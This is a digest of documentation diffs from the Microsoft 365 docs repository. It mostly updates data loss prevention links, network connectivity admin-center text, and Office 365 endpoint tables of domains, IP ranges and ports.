+|[Learn about data loss prevention](dlp-learn-about-dlp.md)| Helps prevent unintentional sharing of sensitive items. | [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md)|
|[Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md)| Extends DLP capabilities to items that are used and shared on Windows 10 computers. | [Get started with Endpoint data loss prevention](endpoint-dlp-getting-started.md)| |[Learn about the Microsoft Compliance Extension (preview)](dlp-chrome-learn-about.md) | Extends DLP capabilities to the Chrome browser | [Get started with the Microsoft Compliance Extension (preview)](dlp-chrome-get-started.md)| |[Learn about Microsoft 365 data loss prevention on-premises scanner (preview)](dlp-on-premises-scanner-learn.md)|Extends DLP monitoring of file activities and protective actions for those files to on-premises file shares and SharePoint folders and document libraries.|[Get started with Microsoft 365 data loss prevention on-premises scanner (preview)](dlp-on-premises-scanner-get-started.md)|
-|[Protect sensitive information in Microsoft Teams chat and channel messages](dlp-microsoft-teams.md) | Extends some DLP functionality to Teams chat and channel messages | [Learn about the default data loss prevention policy in Microsoft Teams (preview)](dlp-teams-default-policy.md)|
+|[Protect sensitive information in Microsoft Teams chat and channel messages](dlp-microsoft-teams.md) | Extends some DLP functionality to Teams chat and channel messages | [Learn about the default data loss prevention policy in Microsoft Teams (preview)](dlp-teams-default-policy.md)|
++
+## Additional resources
+
+Many organizations are using these information protection capabilities to comply with data privacy regulations. To help, weΓÇÖve designed a workflow to guide you through an end-to-end process to plan and implement capabilities across Microsoft 365, including secure access, threat protection, information protection, and data governance. For more information, see [Deploy information protection for data privacy regulations with Microsoft 365](../solutions/information-protection-deploy.md) (aka.ms/m365dataprivacy).
+
+Additionally, To help you plan an integrated strategy for implementing information protection capabilities, download the *Microsoft 365 information protection and compliance capabilities* set of illustrations. Feel free to adapt these illustrations for your own use.
+
+| Item | Description |
+|:--|:|
+|[![Model poster: Microsoft 365 information protection and compliance capabilities](../media/solutions-architecture-center/m365-compliance-illustrations-thumb.png)](https://download.microsoft.com/download/3/a/6/3a6ab1a3-feb0-4ee2-8e77-62415a772e53/m365-compliance-illustrations.pdf) <br/> [Download as a PDF](https://download.microsoft.com/download/3/a/6/3a6ab1a3-feb0-4ee2-8e77-62415a772e53/m365-compliance-illustrations.pdf) \| [Download as a Visio](https://download.microsoft.com/download/3/a/6/3a6ab1a3-feb0-4ee2-8e77-62415a772e53/m365-compliance-illustrations.vsdx) <br/> Japanese: [Download as a PDF](https://download.microsoft.com/download/6/f/1/6f1a7d0e-dd8e-442e-b073-8e94327ae4f8/m365-compliance-illustrations.pdf) \| [Download as a Visio](https://download.microsoft.com/download/6/f/1/6f1a7d0e-dd8e-442e-b073-8e94327ae4f8/m365-compliance-illustrations.vsdx) <br/> Updated October 2020|Includes: <ul><li> Microsoft information protection and data loss prevention</li><li>Retention policies and retention labels </li><li>Information barriers</li><li>Communication compliance</li><li>Insider risk management</li><li>Third-party data ingestion</li>|
compliance Keyword Queries And Search Conditions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/keyword-queries-and-search-conditions.md
For more information about creating queries using the `SensitiveType` property,
Then you can use the ID in the `SensitiveType` search property to return documents that contain the custom sensitive data type; for example, `SensitiveType:7e13277e-6b04-3b68-94ed-1aeb9d47de37` -- You can't use sensitive information types and the `SensitiveType` search property to search for sensitive data at-rest in Exchange Online mailboxes. This includes 1:1 chat messages, 1:N group chat messages, and team channel conversations in Microsoft teams because all of this content is stored in mailboxes. However, you can use data loss prevention (DLP) policies to protect sensitive email data in transit. For more information, see [Overview of data loss prevention policies](data-loss-prevention-policies.md) and [Search for and find personal data](/compliance/regulatory/gdpr).
+- You can't use sensitive information types and the `SensitiveType` search property to search for sensitive data at-rest in Exchange Online mailboxes. This includes 1:1 chat messages, 1:N group chat messages, and team channel conversations in Microsoft teams because all of this content is stored in mailboxes. However, you can use data loss prevention (DLP) policies to protect sensitive email data in transit. For more information, see [Learn about data loss prevention](dlp-learn-about-dlp.md) and [Search for and find personal data](/compliance/regulatory/gdpr).
## Search operators
compliance Manage Information Governance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/manage-Information-governance.md
audience: Admin-+ localization_priority: Priority search.appverid: - MOE150 - MET150
+recommendations: false
description: "Implement Microsoft Information Governance capabilities to govern your data for compliance or regulatory requirements."
compliance Microsoft 365 Compliance Center https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/microsoft-365-compliance-center.md
In addition to links in cards on the home page, you'll see a navigation pane on
| | | |||
-|![Navigation in the Microsoft 365 compliance center](../medi) <br> Automate and simplify the retention schedule for regulatory, legal and business-critical records in your organization.
+|![Navigation in the Microsoft 365 compliance center](../medi) <br> Automate and simplify the retention schedule for regulatory, legal and business-critical records in your organization.
## How do I get the compliance center?
To go there, in the Microsoft 365 compliance center, in the navigation pane on t
- **Configure insider risk management policies** to help minimize internal risks and enable you to detect, investigate, and take action for risky activities in your organization. See [Insider risk management](insider-risk-management.md). -- **Review your organization's data loss prevention policies** and make required changes as necessary. To learn more about, see [Overview of data loss prevention policies](data-loss-prevention-policies.md).
+- **Review your organization's data loss prevention policies** and make required changes as necessary. To learn more about, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
- **Get acquainted with and set up Microsoft Cloud App Security**. See [Quickstart: Get started with Microsoft Cloud App Security](/cloud-app-security/getting-started-with-cloud-app-security).
compliance Microsoft 365 Solution Catalog https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/microsoft-365-solution-catalog.md
The **Information protection & governance** section shows you at a glance how yo
From here, you'll see cards for the following solutions: -- [Data loss prevention](data-loss-prevention-policies.md): Detects sensitive content as it's used and shared throughout your organization, in the cloud and on devices, and helps prevent accidental data loss.
+- [Data loss prevention](dlp-learn-about-dlp.md): Detects sensitive content as it's used and shared throughout your organization, in the cloud and on devices, and helps prevent accidental data loss.
- [Information governance](manage-information-governance.md): Manages your content lifecycle using solutions to import, store, and classify business-critical data so you can keep what you need and delete what you don't.ΓÇï - [Information protection](information-protection.md): Discovers, classifies, and protects sensitive and business-critical content throughout its lifecycle across your organization. - [Records management](records-management.md): Uses intelligent classification to automate and simplify the retention schedule for regulatory, legal, and business-critical records in your organization.
compliance Protect Documents That Have Fci Or Other Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/protect-documents-that-have-fci-or-other-properties.md
For more information, see [Manually request crawling and re-indexing of a site,
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md)
compliance Retention Limits https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/retention-limits.md
Last updated audience: Admin-+ localization_priority: Priority
search.appverid: - MOE150 - MET150
+hideEdit: true
description: "Understand the maximum number of policies and items per policy for retention policies and retention label policies"
compliance Sensitive Information Type Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sensitive-information-type-learn-about.md
Sensitive information types are pattern-based classifiers. They detect sensitive
## Sensitive information types are used in -- [Data loss prevention policies](data-loss-prevention-policies.md)
+- [Data loss prevention policies](dlp-learn-about-dlp.md)
- [Sensitivity labels](sensitivity-labels.md) - [Retention labels](retention.md) - [Insider risk management](insider-risk-management.md)
compliance Sit Modify Edm Schema Configurable Match https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sit-modify-edm-schema-configurable-match.md
The `ignoredDelimiters` flag doesn't support:
- [Create a custom sensitive information type with Exact Data Match based classification](create-custom-sensitive-information-types-with-exact-data-match-based-classification.md) - [Sensitive information type-entity definitions](sensitive-information-type-entity-definitions.md) - [Custom sensitive information types](./sensitive-information-type-learn-about.md)-- [Overview of DLP policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Microsoft Cloud App Security](/cloud-app-security) - [New-DlpEdmSchema](/powershell/module/exchange/new-dlpedmschema)
compliance Use Drive Shipping To Import Pst Files To Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-drive-shipping-to-import-pst-files-to-office-365.md
To install the Azure Storage Explorer and connect to your Azure Storage area:
- Import data to [inactive mailboxes](create-and-manage-inactive-mailboxes.md) to archive data for compliance purposes.
- - Protect your organization against [data loss](data-loss-prevention-policies.md) of sensitive information.
+ - Protect your organization against [data loss](dlp-learn-about-dlp.md) of sensitive information.
- Here's an example of the secure storage account key and a BitLocker encryption key. This example also contains the syntax for the WAImportExport.exe command that you run to copy PST files to a hard drive. Be sure to take precautions to protect these just like you would protect passwords or other security-related information.
compliance Use Network Upload To Import Pst Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-network-upload-to-import-pst-files.md
After you create the import job in Step 5, Microsoft 365 analyzes the data in th
- Importing data to [inactive mailboxes](create-and-manage-inactive-mailboxes.md) to archive data for compliance purposes.
- - Using [data loss prevention policies](data-loss-prevention-policies.md) to prevent sensitive data from leaking outside your organization.
+ - Using [data loss prevention policies](dlp-learn-about-dlp.md) to prevent sensitive data from leaking outside your organization.
- Here's an example of the Shared Access Signature (SAS) URL that's obtained in Step 1. This example also contains the syntax for the command that you run in the AzCopy.exe tool to upload PST files. Be sure to take precautions to protect the SAS URL just like you would protect passwords or other security-related information.
compliance Use Notifications And Policy Tips https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-notifications-and-policy-tips.md
You can customize the text for policy tips separately from the email notificatio
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
-
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md)-- [DLP policy conditions, exceptions, and actions (preview)](./dlp-microsoft-teams.md?view=o365-worldwide)
-
+- [DLP policy conditions, exceptions, and actions (preview)](./dlp-microsoft-teams.md)
- [Create a DLP policy to protect documents with FCI or other properties](protect-documents-that-have-fci-or-other-properties.md)
-
- [What the DLP policy templates include](what-the-dlp-policy-templates-include.md)
-
- [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
enterprise Contoso Security Summary https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/contoso-security-summary.md
To follow security best practices and Microsoft 365 for enterprise deployment re
- Prevent intranet data leaks with Data Loss Prevention
- Contoso configured [Data Loss Prevention](../compliance/data-loss-prevention-policies.md) policies for Exchange Online, SharePoint, and OneDrive for Business to prevent users from accidentally or intentionally sharing sensitive data.
+ Contoso configured [Data Loss Prevention](../compliance/dlp-learn-about-dlp.md) policies for Exchange Online, SharePoint, and OneDrive for Business to prevent users from accidentally or intentionally sharing sensitive data.
- Prevent device data leaks Windows Information Protection
enterprise Microsoft 365 Vpn Implement Split Tunnel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/microsoft-365-vpn-implement-split-tunnel.md
No, it does not, the Office 365 endpoints are not the same as the consumer servi
### How do I apply DLP and protect my sensitive data when the traffic no longer flows through my on-premises solution?
-To help you prevent the accidental disclosure of sensitive information, Office 365 has a rich set of [built-in tools](../compliance/data-loss-prevention-policies.md). You can use the built-in [DLP capabilities](../compliance/data-loss-prevention-policies.md) of Teams and SharePoint to detect inappropriately stored or shared sensitive information. If part of your remote work strategy involves a bring-your-own-device (BYOD) policy, you can use [app-based Conditional Access](/azure/active-directory/conditional-access/app-based-conditional-access) to prevent sensitive data from being downloaded to users' personal devices
+To help you prevent the accidental disclosure of sensitive information, Office 365 has a rich set of [built-in tools](../compliance/information-protection.md). You can use the built-in [DLP capabilities](../compliance/dlp-learn-about-dlp.md) of Teams and SharePoint to detect inappropriately stored or shared sensitive information. If part of your remote work strategy involves a bring-your-own-device (BYOD) policy, you can use [app-based Conditional Access](/azure/active-directory/conditional-access/app-based-conditional-access) to prevent sensitive data from being downloaded to users' personal devices
### How do I evaluate and maintain control of the user's authentication when they are connecting directly?
enterprise Office 365 Network Mac Perf Insights https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/office-365-network-mac-perf-insights.md
For more information about how to resolve this issue, see [Egress network connec
## Network intermediary device
-This insight will be displayed if we detected devices between your users and Microsoft's network which may impact the Office 365 user experience. It is recommended that these be bypassed for specific Microsoft 365 network traffic that is destined for Microsoft datacenters. This recommendation is additionally described in [Microsoft 365 Network Connectivity Principles](microsoft-365-network-connectivity-principles.md)
+This insight will be displayed if we detected devices between your users and Microsoft's network which may impact the Office 365 user experience. It is recommended that these be bypassed for specific Microsoft 365 network traffic that is destined for Microsoft datacenters. This recommendation is additionally described in [Microsoft 365 Network Connectivity Principles](microsoft-365-network-connectivity-principles.md).
+
+One network intermediary insight we show is SSL break and inspection when critical Office 365 network endpoints for Exchange, SharePoint and Teams are intercepted and decrypted by network intermediary devices.
### What does this mean?
enterprise Office 365 Network Mac Perf Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/office-365-network-mac-perf-overview.md
The Microsoft 365 Admin Center now includes aggregated network connectivity metr
> [!div class="mx-imgBorder"] > ![Network connectivity test tool](../media/m365-mac-perf/m365-mac-perf-admin-center.png)
-**Network assessments** and **network insights** are displayed in the Microsoft 365 Admin Center under **Health | Connectivity**.
+**Network assessments** and **network insights** are displayed in the Microsoft 365 Admin Center under **Health | Network connectivity**.
> [!div class="mx-imgBorder"] > ![Network performance page](../media/m365-mac-perf/m365-mac-perf-page-nav.png) >[!NOTE]
->The network connectivity test tool supports tenants in WW Commercial and Germany but not GCC Moderate, GCC High, DoD or China.
+>Network connectivity in the Admin Center supports tenants in WW Commercial and Germany but not GCC Moderate, GCC High, DoD or China.
-When you first navigate to the network performance page, you will see an overview pane containing a map of global network performance, a network assessment scoped to the entire tenant, and a list of current issues. From the overview, you can drill down to view specific network performance metrics and issues by location. For more information, see [Network performance overview in the Microsoft 365 Admin Center](#network-connectivity-overview-in-the-microsoft-365-admin-center).
+When you first navigate to the network performance page, you will have to configure your locations in order to see the map of global network performance, a network assessment scoped to the entire tenant, percentage of your users working remotely vs onsite, and a list of current issues to take action on and/or to research further. From the overview pane, you can drill down to view specific network performance metrics and issues by location. For more information, see [Network performance overview in the Microsoft 365 Admin Center](#network-connectivity-overview-in-the-microsoft-365-admin-center).
-You may be asked to join the public preview for this feature on behalf of your organization. Acceptance usually happens immediately, after which you would see the network connectivity page.
+You may be asked to join the public preview for this feature on behalf of your organization. Acceptance usually happens immediately, after which you would see the network connectivity page.
-On navigating to the network connectivity page, you will see an overview pane containing a map of global network performance, a network assessment scoped to the entire tenant, percentage of your users working remotely vs onsite, and a list of current issues to take action on or to research further. To access this page, you must be an administrator for the organization within Microsoft 365. The Report Reader administrative role will have read access to this information. To configure locations and other elements of network connectivity an administrator must be part of a server administrator role such as the Service support admin role. From the overview, you can drill down to view specific network performance metrics and issues by location.
+To access the network connectivity page, you must be an administrator for the organization within Microsoft 365. The Report Reader administrative role will have read access to this information. To configure locations and other elements of network connectivity an administrator must be part of a server administrator role such as the Service support admin role.
## Pre-requisites for network connectivity assessments to appear
For this option, you must have at least two computers running at each office loc
Windows Location Service must be consented on the machines. You can test this by running the **Maps** app and locating yourself. It can be enabled on a single machine with **Settings | Privacy | Location** where the setting _Allow apps to access your location_ must be enabled. Windows Location Services consent can be deployed to PCs using MDM or Group Policy with the setting _LetAppsAccessLocation_.
-You do not need to add locations in the Admin Center with this method as they are automatically identified at the city resolution. You cannot show multiple office locations within a city using Windows Location Services. Location information is also rounded to the nearest 300 meters by 300 meters before being uploaded so that more precise location information is not possible to access.
+You do not need to add locations in the Admin Center with this method as they are automatically identified at the city resolution. Multiple office locations within the same city will not be shown when using Windows Location Services. Location information is rounded to the nearest 300 metres by 300 metres so that more precise location information is not accessed.
The machines should have Wi-Fi networking rather than an ethernet cable. Machines with an ethernet cable do not have accurate location information.
includes Office 365 U.S. Government Dod Endpoints https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/office-365-u.s.-government-dod-endpoints.md
<!--THIS FILE IS AUTOMATICALLY GENERATED. MANUAL CHANGES WILL BE OVERWRITTEN.--> <!--Please contact the Office 365 Endpoints team with any questions.-->
-<!--USGovDoD endpoints version 2021032900-->
-<!--File generated 2021-03-29 11:00:02.9768-->
+<!--USGovDoD endpoints version 2021042900-->
+<!--File generated 2021-04-29 17:00:04.1349-->
## Exchange Online
ID | Category | ER | Addresses | Ports
-- | - | | - | - 11 | Allow<BR>Required | Yes | `*.dod.online.office365.us`<BR>`52.127.80.0/23, 52.181.164.39/32, 52.182.95.191/32` | **TCP:** 443 12 | Default<BR>Required | Yes | `*.dod.cdn.office365.us`<BR>`52.181.164.39/32, 52.182.95.191/32` | **TCP:** 443
-13 | Allow<BR>Required | Yes | `*.gov.us.microsoftonline.com, adminwebservice.gov.us.microsoftonline.com, becws.gov.us.microsoftonline.com, dod-graph.microsoft.us, graph.microsoftazure.us, login.microsoftonline.us, provisioningapi.gov.us.microsoftonline.com`<BR>`20.140.232.0/23, 52.126.194.0/23, 2001:489a:3500::/50` | **TCP:** 443
+13 | Allow<BR>Required | Yes | `*.gov.us.microsoftonline.com, dod-graph.microsoft.us, graph.microsoftazure.us, login.microsoftonline.us`<BR>`20.140.232.0/23, 52.126.194.0/23, 2001:489a:3500::/50` | **TCP:** 443
14 | Default<BR>Required | No | `*.msauth.net, *.msauthimages.us, *.msftauth.net, *.msftauthimages.us, clientconfig.microsoftonline-p.net, graph.windows.net, login.microsoftonline.com, login.microsoftonline-p.com, login.windows.net, loginex.microsoftonline.com, login-us.microsoftonline.com, mscrl.microsoft.com, nexus.microsoftonline-p.com, secure.aadcdn.microsoftonline-p.com` | **TCP:** 443 15 | Allow<BR>Required | Yes | `portal.apps.mil, reports.apps.mil, webshell.dodsuite.office365.us, www.ohome.apps.mil`<BR>`52.127.72.42/32, 52.127.76.42/32, 52.180.251.166/32, 52.181.24.112/32, 52.181.160.19/32, 52.181.160.113/32, 52.181.160.236/32, 52.182.24.200/32, 52.182.54.237/32, 52.182.92.132/32` | **TCP:** 443 16 | Allow<BR>Required | Yes | `*.osi.apps.mil, dod.loki.office365.us`<BR>`52.127.72.0/21, 2001:489a:2206::/48` | **TCP:** 443
includes Office 365 Worldwide Endpoints https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/office-365-worldwide-endpoints.md
<!--THIS FILE IS AUTOMATICALLY GENERATED. MANUAL CHANGES WILL BE OVERWRITTEN.--> <!--Please contact the Office 365 Endpoints team with any questions.-->
-<!--Worldwide endpoints version 2021030100-->
-<!--File generated 2021-03-01 11:00:01.8084-->
+<!--Worldwide endpoints version 2021042900-->
+<!--File generated 2021-04-29 17:00:02.0425-->
## Exchange Online
ID | Category | ER | Addresses | Ports
11 | Optimize<BR>Required | Yes | `13.107.64.0/18, 52.112.0.0/14, 52.120.0.0/14` | **UDP:** 3478, 3479, 3480, 3481 12 | Allow<BR>Required | Yes | `*.lync.com, *.teams.microsoft.com, teams.microsoft.com`<BR>`13.107.64.0/18, 52.112.0.0/14, 52.120.0.0/14, 52.238.119.141/32, 52.244.160.207/32, 2603:1027::/48, 2603:1037::/48, 2603:1047::/48, 2603:1057::/48, 2620:1ec:6::/48, 2620:1ec:40::/42` | **TCP:** 443, 80 13 | Allow<BR>Required | Yes | `*.broadcast.skype.com, broadcast.skype.com`<BR>`13.107.64.0/18, 52.112.0.0/14, 52.120.0.0/14, 52.238.119.141/32, 52.244.160.207/32, 2603:1027::/48, 2603:1037::/48, 2603:1047::/48, 2603:1057::/48, 2620:1ec:6::/48, 2620:1ec:40::/42` | **TCP:** 443
-15 | Default<BR>Required | No | `*.sfbassets.com, *.urlp.sfbassets.com, skypemaprdsitus.trafficmanager.net` | **TCP:** 443, 80
+15 | Default<BR>Required | No | `*.sfbassets.com, skypemaprdsitus.trafficmanager.net` | **TCP:** 443, 80
16 | Default<BR>Required | No | `*.keydelivery.mediaservices.windows.net, *.msecnd.net, *.streaming.mediaservices.windows.net, ajax.aspnetcdn.com, mlccdn.blob.core.windows.net` | **TCP:** 443 17 | Default<BR>Required | No | `aka.ms, amp.azure.net` | **TCP:** 443 18 | Default<BR>Optional<BR>**Notes:** Federation with Skype and public IM connectivity: Contact picture retrieval | No | `*.users.storage.live.com` | **TCP:** 443
ID | Category | ER | Addresses | Ports
## Microsoft 365 Common and Office Online ID | Category | ER | Addresses | Ports
- | -- | | -- | -
+ | -- | | - | -
40 | Default<BR>Optional<BR>**Notes:** Office 365 Video CDNs | No | `ajax.aspnetcdn.com, r3.res.outlook.com, spoprod-a.akamaihd.net` | **TCP:** 443 41 | Default<BR>Optional<BR>**Notes:** Microsoft Stream | No | `*.microsoftstream.com, amp.azure.net, s0.assets-yammer.com, vortex.data.microsoft.com` | **TCP:** 443 42 | Default<BR>Optional<BR>**Notes:** Microsoft Stream CDN | No | `amsglob0cdnstream13.azureedge.net, amsglob0cdnstream14.azureedge.net` | **TCP:** 443
ID | Category | ER | Addresses | Ports
53 | Default<BR>Required | No | `ajax.aspnetcdn.com, apis.live.net, cdn.optimizely.com, officeapps.live.com, www.onedrive.com` | **TCP:** 443 56 | Allow<BR>Required | Yes | `*.msftidentity.com, *.msidentity.com, account.activedirectory.windowsazure.com, accounts.accesscontrol.windows.net, adminwebservice.microsoftonline.com, api.passwordreset.microsoftonline.com, autologon.microsoftazuread-sso.com, becws.microsoftonline.com, clientconfig.microsoftonline-p.net, companymanager.microsoftonline.com, device.login.microsoftonline.com, graph.microsoft.com, graph.windows.net, login.microsoft.com, login.microsoftonline.com, login.microsoftonline-p.com, login.windows.net, logincert.microsoftonline.com, loginex.microsoftonline.com, login-us.microsoftonline.com, nexus.microsoftonline-p.com, passwordreset.microsoftonline.com, provisioningapi.microsoftonline.com`<BR>`20.190.128.0/18, 40.126.0.0/18, 2603:1006:2000::/48, 2603:1007:200::/48, 2603:1016:1400::/48, 2603:1017::/48, 2603:1026:3000::/48, 2603:1027:1::/48, 2603:1036:3000::/48, 2603:1037:1::/48, 2603:1046:2000::/48, 2603:1047:1::/48, 2603:1056:2000::/48, 2603:1057:2::/48` | **TCP:** 443, 80 59 | Default<BR>Required | No | `*.hip.live.com, *.microsoftonline.com, *.microsoftonline-p.com, *.msauth.net, *.msauthimages.net, *.msecnd.net, *.msftauth.net, *.msftauthimages.net, *.phonefactor.net, enterpriseregistration.windows.net, management.azure.com, policykeyservice.dc.ad.msft.net` | **TCP:** 443, 80
-64 | Allow<BR>Required | Yes | `*.compliance.microsoft.com, *.manage.office.com, *.protection.office.com, *.security.microsoft.com, compliance.microsoft.com, manage.office.com, protection.office.com, security.microsoft.com`<BR>`13.80.125.22/32, 13.91.91.243/32, 13.107.6.156/31, 13.107.7.190/31, 13.107.9.156/31, 40.81.156.154/32, 40.90.218.198/32, 52.108.0.0/14, 52.174.56.180/32, 52.183.75.62/32, 52.184.165.82/32, 104.42.230.91/32, 157.55.145.0/25, 157.55.155.0/25, 157.55.227.192/26, 2603:1006:1400::/40, 2603:1010:2:2::a/128, 2603:1016:2400::/40, 2603:1020:400::26/128, 2603:1020:600::12f/128, 2603:1020:600::1f0/128, 2603:1020:800:2::45/128, 2603:1026:2400::/40, 2603:1030:7:5::25/128, 2603:1036:2400::/40, 2603:1040:400::5e/128, 2603:1040:601::2/128, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f100:1002::4134:c440/128, 2a01:111:f100:2000::a83e:33a8/128, 2a01:111:f100:2002::8975:2d98/128, 2a01:111:f100:3000::a83e:1884/128, 2a01:111:f100:3002::8987:3552/128, 2a01:111:f100:4002::9d37:c021/128, 2a01:111:f100:4002::9d37:c3de/128, 2a01:111:f100:6000::4134:a6c7/128, 2a01:111:f100:6000::4134:b84b/128, 2a01:111:f100:7000::6fdd:5245/128, 2a01:111:f100:7000::6fdd:6fc4/128, 2a01:111:f100:8000::4134:941b/128, 2a01:111:f100:9001::1761:914f/128, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443
-65 | Allow<BR>Required | Yes | `*.portal.cloudappsecurity.com, account.office.net, admin.microsoft.com, home.office.com, portal.office.com, www.office.com`<BR>`13.80.125.22/32, 13.91.91.243/32, 13.107.6.156/31, 13.107.7.190/31, 13.107.9.156/31, 40.81.156.154/32, 40.90.218.198/32, 52.108.0.0/14, 52.174.56.180/32, 52.183.75.62/32, 52.184.165.82/32, 104.42.230.91/32, 157.55.145.0/25, 157.55.155.0/25, 157.55.227.192/26, 2603:1006:1400::/40, 2603:1010:2:2::a/128, 2603:1016:2400::/40, 2603:1020:400::26/128, 2603:1020:600::12f/128, 2603:1020:600::1f0/128, 2603:1020:800:2::45/128, 2603:1026:2400::/40, 2603:1030:7:5::25/128, 2603:1036:2400::/40, 2603:1040:400::5e/128, 2603:1040:601::2/128, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f100:1002::4134:c440/128, 2a01:111:f100:2000::a83e:33a8/128, 2a01:111:f100:2002::8975:2d98/128, 2a01:111:f100:3000::a83e:1884/128, 2a01:111:f100:3002::8987:3552/128, 2a01:111:f100:4002::9d37:c021/128, 2a01:111:f100:4002::9d37:c3de/128, 2a01:111:f100:6000::4134:a6c7/128, 2a01:111:f100:6000::4134:b84b/128, 2a01:111:f100:7000::6fdd:5245/128, 2a01:111:f100:7000::6fdd:6fc4/128, 2a01:111:f100:8000::4134:941b/128, 2a01:111:f100:9001::1761:914f/128, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443, 80
+64 | Allow<BR>Required | Yes | `*.compliance.microsoft.com, *.manage.office.com, *.protection.office.com, *.security.microsoft.com, compliance.microsoft.com, manage.office.com, protection.office.com, security.microsoft.com`<BR>`52.108.0.0/14, 2603:1006:1400::/40, 2603:1016:2400::/40, 2603:1026:2400::/40, 2603:1036:2400::/40, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443
+65 | Allow<BR>Required | Yes | `*.portal.cloudappsecurity.com, account.office.net, home.office.com, www.office.com`<BR>`52.108.0.0/14, 2603:1006:1400::/40, 2603:1016:2400::/40, 2603:1026:2400::/40, 2603:1036:2400::/40, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443, 80
66 | Default<BR>Required | No | `suite.office.net` | **TCP:** 443 67 | Default<BR>Optional<BR>**Notes:** Security and Compliance Center eDiscovery export | No | `*.blob.core.windows.net` | **TCP:** 443 68 | Default<BR>Optional<BR>**Notes:** Portal and shared: 3rd party office integration. (including CDNs) | No | `*.helpshift.com, *.localytics.com, analytics.localytics.com, api.localytics.com, connect.facebook.net, firstpartyapps.oaspapps.com, outlook.uservoice.com, prod.firstpartyapps.oaspapps.com.akadns.net, rink.hockeyapp.net, sdk.hockeyapp.net, telemetryservice.firstpartyapps.oaspapps.com, web.localytics.com, webanalytics.localytics.com, wus-firstpartyapps.oaspapps.com` | **TCP:** 443
ID | Category | ER | Addresses | Ports
72 | Default<BR>Optional<BR>**Notes:** Azure Rights Management (RMS) with Office 2010 clients | No | `*.cloudapp.net` | **TCP:** 443 73 | Default<BR>Required | No | `*.aadrm.com, *.azurerms.com, *.informationprotection.azure.com, ecn.dev.virtualearth.net, informationprotection.hosting.portal.azure.net` | **TCP:** 443 74 | Default<BR>Optional<BR>**Notes:** Remote Connectivity Analyzer - Initiate connectivity tests. | No | `testconnectivity.microsoft.com` | **TCP:** 443, 80
-75 | Default<BR>Optional<BR>**Notes:** Graph.windows.net, Office 365 Management Pack for Operations Manager, SecureScore, Azure AD Device Registration, Forms, StaffHub, Application Insights, captcha services | No | `*.hockeyapp.net, *.sharepointonline.com, cdn.forms.office.net, dc.applicationinsights.microsoft.com, dc.services.visualstudio.com, forms.microsoft.com, mem.gfx.ms, office365servicehealthcommunications.cloudapp.net, osiprod-cus-daffodil-signalr-00.service.signalr.net, osiprod-neu-daffodil-signalr-00.service.signalr.net, osiprod-weu-daffodil-signalr-00.service.signalr.net, osiprod-wus-daffodil-signalr-00.service.signalr.net, signup.microsoft.com, staffhub.ms, staffhub.uservoice.com, staffhubweb.azureedge.net, watson.telemetry.microsoft.com` | **TCP:** 443
